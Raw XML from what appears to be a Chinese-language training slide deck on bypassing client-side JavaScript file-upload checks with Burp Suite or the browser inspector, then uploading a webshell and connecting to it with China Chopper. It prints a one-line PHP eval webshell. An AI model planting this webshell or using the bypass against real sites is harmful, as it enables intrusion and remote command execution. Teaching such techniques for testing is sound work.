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文件上传客户端验证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- JS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验证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，菜刀连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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9512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一句话木马：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php &lt;?php @eval($_POST[“cmd”]); ?&gt;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5665" y="2240280"/>
            <a:ext cx="7901305" cy="43122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808355" y="2916555"/>
            <a:ext cx="4721860" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="472186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694112" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="36941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124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JS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验证代码分析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13766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Burpsuite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剔除响应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07773" y="2916238"/>
            <a:ext cx="5321935" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="532193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191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浏览器审计工具剔除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7377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Webshell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，菜刀连接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808355" y="2916555"/>
            <a:ext cx="4721860" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="472186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694112" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="36941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124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JS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验证代码分析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13766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Burpsuite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剔除响应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07773" y="2916238"/>
            <a:ext cx="5321935" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="532193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191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浏览器审计工具剔除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7377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Webshell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，菜刀连接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验证代码分析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465" y="1508125"/>
            <a:ext cx="9323070" cy="4270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7395" y="402590"/>
            <a:ext cx="4082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JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>验证代码分析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38195" y="3163570"/>
            <a:ext cx="50253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Burpsuite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剔除响应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Burpsuite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剔除响应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38684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对于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前端验证，直接删除掉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代码之后就可以绕过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验证。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1755140"/>
            <a:ext cx="9032875" cy="4746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6660" y="3163570"/>
            <a:ext cx="467931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浏览器审计工具剔除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浏览器审计工具剔除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46431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利用浏览器的审查工具剔除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之后，保存为新文件然后进行文件上传。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045" y="2017395"/>
            <a:ext cx="9440545" cy="4233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08985" y="3081655"/>
            <a:ext cx="55740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，菜刀连接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WPS 演示</Application>
  <PresentationFormat>宽屏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JS验证代码分析</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Burpsuite剔除响应JS</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>浏览器审计工具剔除JS</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>上传Webshell，菜刀连接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83</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-01T21:26:57Z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